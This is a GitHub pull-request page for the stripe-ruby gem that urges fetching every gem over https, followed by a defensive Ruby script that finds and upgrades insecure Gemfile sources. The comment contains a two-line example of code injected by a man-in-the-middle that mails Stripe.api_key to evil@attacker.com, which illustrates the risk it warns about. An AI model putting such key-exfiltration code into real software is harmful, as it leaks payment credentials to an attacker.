Update gem security advice #63

merged 1 commit into from May 1, 2013


alexspeller commented Apr 6, 2013

Requesting stripe gems over https doesn't help you if the other gems in your system (e.g. rails) are fetched over http - a MITM attacker could corrupt any gem fetched over http to compromise the stripe code.

For example, if I was an evil attacker, even if you fetched the stripe gem securely, if you fetched rails over HTTP, I could alter the rails gem to include the code:

```ruby
key  = Stripe.api_key
mail to: "evil@attacker.com", subject: "Someone's secret key", body: key
```

The only way to ensure gem security against a MITM attacker is to ensure all gems are fetched over https, not just some of them.
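As an added example (not code from the stripe-ruby project or the PR author), the Ruby audit below flags every Gemfile and Gemfile.lock source that is not served over https and rewrites the plain-http ones; the sample Gemfile it runs against is constructed.

```ruby
# Added example, not from the stripe-ruby repository or the PR author: audit a
# Gemfile and Gemfile.lock for gem sources that are not fetched over HTTPS.
# A plain-http "source" line, a per-gem source: option, or a "remote:" entry in
# the lockfile lets a network attacker substitute a modified gem, which is the
# risk the comment above describes, so every source must be https.
require 'uri'

SOURCE_PATTERNS = [
  /^\s*source\s+["']([^"']+)["']/, # Gemfile:      source "..."
  /\bsource:\s*["']([^"']+)["']/,  # Gemfile:      gem "x", source: "..."
  /^\s*remote:\s*(\S+)/            # Gemfile.lock: remote: ...
].freeze

# Schemes that move gem data over the network without TLS.
INSECURE_SCHEMES = %w[http git].freeze

# Returns [{ source:, line: }, ...] for every source URL using an insecure scheme.
# Path sources (no scheme) are local and are not reported.
def insecure_sources(text)
  findings = []
  text.each_line.with_index(1) do |line, lineno|
    SOURCE_PATTERNS.each do |pattern|
      m = pattern.match(line) or next
      scheme = (URI.parse(m[1]).scheme rescue nil)
      findings << { source: m[1], line: lineno } if INSECURE_SCHEMES.include?(scheme)
    end
  end
  findings
end

# Rewrites http:// to https:// on source lines only; git:// sources are left
# for a human, since the host may not serve the same repository over https.
def upgrade_sources(text)
  text.each_line.map do |line|
    SOURCE_PATTERNS.any? { |p| p.match?(line) } ? line.sub(%r{\bhttp://}, 'https://') : line
  end.join
end

# Constructed sample Gemfile: the default source is http, only the stripe gem is https.
SAMPLE_GEMFILE = <<~GEMFILE
  source "http://rubygems.org"
  gem "rails", "3.2.13"
  gem "stripe", source: "https://rubygems.org"
GEMFILE

if __FILE__ == $PROGRAM_NAME
  insecure_sources(SAMPLE_GEMFILE).each { |f| puts "line #{f[:line]}: insecure source #{f[:source]}" }
  puts upgrade_sources(SAMPLE_GEMFILE)
end
```

Run it against a real Gemfile and Gemfile.lock (`insecure_sources(File.read("Gemfile.lock"))`) to confirm that no gem, not only the stripe gem, is still pulled over http.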

@ebroder ebroder merged commit abf5400 into stripe:master May 1, 2013
